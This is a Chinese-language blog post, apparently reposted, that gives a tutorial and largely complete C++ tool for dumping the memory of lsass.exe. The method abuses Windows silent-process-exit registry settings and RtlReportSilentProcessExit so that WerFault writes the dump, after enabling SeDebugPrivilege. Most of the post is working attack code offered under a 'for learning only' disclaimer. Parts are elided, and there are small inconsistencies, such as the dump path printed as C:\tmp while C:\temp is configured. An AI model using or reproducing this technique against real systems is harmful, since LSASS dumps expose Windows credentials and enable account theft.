前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。(本文仅用于交流学习)
基础知识
我们先来看看什么是静默退出,在Windows7开始,就可以设置对指定进程的静默退出(官方术语是”无提示进程退出”)。监视功能不会检测进程最后一个线程退出时发生的正常进程终止,监视功能不会检测由内核模式代码启动的进程终止。
如果我们要对某进程使用静默退出,我们可以在注册表中如下设置,将GlobalFlag值设置为0x200,当然我们需要先设置ProcessName项指定进程
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ProcessName\\GlobalFlag
我们还可以配置当进程以无提示方式退出时要执行的操作。可以配置通知、事件日志记录和转储文件的创建,因为我们要Dump,因此我们重点关心转储文件的创建。
这里有全局配置与应用程序设置两种
- 全局设置:适用于静默退出监视的所有进程,在注册表中的位置如下HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
- 应用程序设置:设用于单个进程的设置,在注册中设置的位置如下HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\ProcessName
我们这里选择应用程序设置即可,没必要使用全局的设置。还有很多设置,但是这里我们只看我们需要使用的,所有我们来看看报告模式,大致就是检测到进程静默退出后,执行的操作(但是此设置不能用于全局设置)
ReportingMode有三个值可以设置,这里我们选择LOCAL_DUMP(0x2)
既然我们使用转储文件,那么还需要指定转储文件的位置
LocalDumpFolder所对应的值即可我们转储文件所存放的位置,那对于我们的转储文件有没有大小的限制呢,默认情况下是没有限制的。
我们还需要看看转储类型
我们可以设置DumpType的值去指定我们需要转储的类型,上面图片可能看不太明白,这不影响,我们可以设置为2,为什么设置为2我们看看如下
然后就是最重要的一步了,如何使进程崩溃(lsass.exe进程崩溃的话会导致机器重启),显然真的让其崩溃肯定不可取。我们可以利用RtlReportSilentProcessExit这个函数API,该API会与Windows错误报告服务(WerSvcGroup下的WerSvc)通信,告诉服务该进程正在执行静默退出。然后,WER服务将启动WerFault.exe,该文件将转储现有进程。但是调用此API不会导致进程退出。所有这一步就解决了。
关于RtlReportSilentProcessExit函数的定义
现在应该思路很清晰了吧,我们可以写个简单的利用程序来帮助我们自动化Dump,我们可以利用Windows API函数帮助我们去设置这些值,这里主要用到RegCreateKeyExW、RegSetValueExW,对于这两个函数的用法与用途,我们来简单的介绍一下
RegCreateKeyExW
该函数主要用于打开指定的注册表的项,如果不存在那么就创建,我们编写一个简单的程序来看看效果
#include <windows.h>
#include <iostream>
using namespace std;
int main(){
HKEY hKey \= HKEY\_CURRENT\_USER;
LPCWSTR lpSubKey \= L"Software\\\\test";
HKEY phkResult \=NULL;
DWORD Result \=NULL;
RegCreateKeyExW(hKey, lpSubKey,0,NULL, REG\_OPTION\_NON\_VOLATILE, KEY\_ALL\_ACCESS,NULL,&phkResult,&Result);
if (Result \==0x00000001L){
cout <<"\[+\] 密钥不存在且已创建"<< endl;
}
else if (Result \==0x00000002L)
{
cout <<"\[+\] 密钥已存在"<< endl;
}
else
{
cout <<"\[-\] RegCreateKeyExW Error"<< endl;
}
}
RegSetValueExW
该函数主要就是在指定的子项中设定指定的数值
#include <windows.h>
#include <iostream>
using namespace std;
int main(){
HKEY hKey \= HKEY\_CURRENT\_USER;
LPCWSTR lpSubKey \= L"Software\\\\test";
HKEY phkResult \=NULL;
LSTATUS Open \= RegOpenKeyExW(hKey, lpSubKey, REG\_OPTION\_NON\_VOLATILE, KEY\_ALL\_ACCESS,&phkResult);
if (Open != ERROR\_SUCCESS){
cout <<"\[-\] Not found"<< endl;
return 1;
}
cout <<"\[+\] RegOpenKeyExW Success"<< endl;
DWORD Test\_Value \=0x20;
LSTATUS SetValye \= RegSetValueExW(phkResult, L"test",0, REG\_DWORD,(const BYTE\*)&Test\_Value, sizeof(DWORD));
if (SetValye != ERROR\_SUCCESS){
cout <<"\[-\] RegSetValueExW Error"<< endl;
return 1;
}
cout <<"\[+\] RegSetValueExW Success"<< endl;
}
好了我们现在来总结一下步骤
- RegCreateKeyExW、RegSetValueExW设置注册表中的HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessName 、HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessName\GlobalFlag
- RegCreateKeyExW、RegSetValueExW设置注册表中的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\ProcessName
- 设置好后获取目标进程,后调用RtlReportSilentProcessExit
代码实现
#include <windows.h>
#include <iostream>
#include <string>
#include <tlhelp32.h>
#include <processthreadsapi.h>
#include <DbgHelp.h>
using namespace std;
typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_func)(
_In_ HANDLE ProcessHandle,
_In_ NTSTATUS ExitStatus
);
RtlReportSilentProcessExit_func RtlReportSilentProcessExit =(RtlReportSilentProcessExit_func)GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlReportSilentProcessExit");
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
ULONG Privilege,BOOL Enable,BOOL CurrentThread, PULONG Enabled
);
_RtlAdjustPrivilege RtlAdjustPrivilege =(_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlAdjustPrivilege");
int SeDebugPrivilege(){
ULONG t;
RtlAdjustPrivilege(20,TRUE,FALSE,&t);
if (RtlAdjustPrivilege ==NULL){
cout <<"[-] Unable to resolve RtlAdjustPrivilege"<< endl;
return 1;
}
cout <<"[+] RtlAdjustPrivilege Success"<< endl;
}
int GetPid(){
HRESULT hr;
DWORD pid;
PROCESSENTRY32 ed;
ed.dwSize= sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
if (Process32First(snapshot,&ed)==TRUE)
{
while (Process32Next(snapshot,&ed)==TRUE)
{
if ((string)ed.szExeFile=="lsass.exe"){
pid = ed.th32ProcessID;
}
}
}
CloseHandle(snapshot);
return pid;
}
int RegeditSet(){
HKEY hKey = HKEY_LOCAL_MACHINE;
LPCWSTR lpSubKey = L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe";
HKEY phkResult;
DWORD Result =NULL;
.............................................................
.............................................................
.............................................................
}
else
{
cout <<"[-] RegCreateKeyExW SilentProcessExit Error"<< endl;
return 1;
}
DWORD ReportingMode =0x2;
WCHAR LocalDumpFolder[MAX_PATH]= L"C:\\temp";
DWORD DumpType =0x2;
.............................................................
.............................................................
.............................................................
if (RegSetValue_ReportingMode != ERROR_SUCCESS || RegSetValue_LocalDumpFolder != ERROR_SUCCESS
|| RegSetValue_DumpType != ERROR_SUCCESS){
cout <<"[-] RegSetValueExW has an Error "<< endl;
return 1;
}
cout <<"[+] Success Setting All"<< endl;
}
int main(){
if (RegeditSet()==1){
return 1;
}
DWORD pid = GetPid();
cout <<"[+] Lsass Pid is:"<< pid << endl;
SeDebugPrivilege();
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE, pid);
if (hProcess ==NULL){
cout <<"[-] OpenProcess Error"<< endl;
return 1;
}
RtlReportSilentProcessExit(hProcess,0);
cout <<"[+] Path:C:\\tmp"<< endl;
}
参考:(建议详细阅读完)https://learn.microsoft.com/zh-cn/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/139298.html<
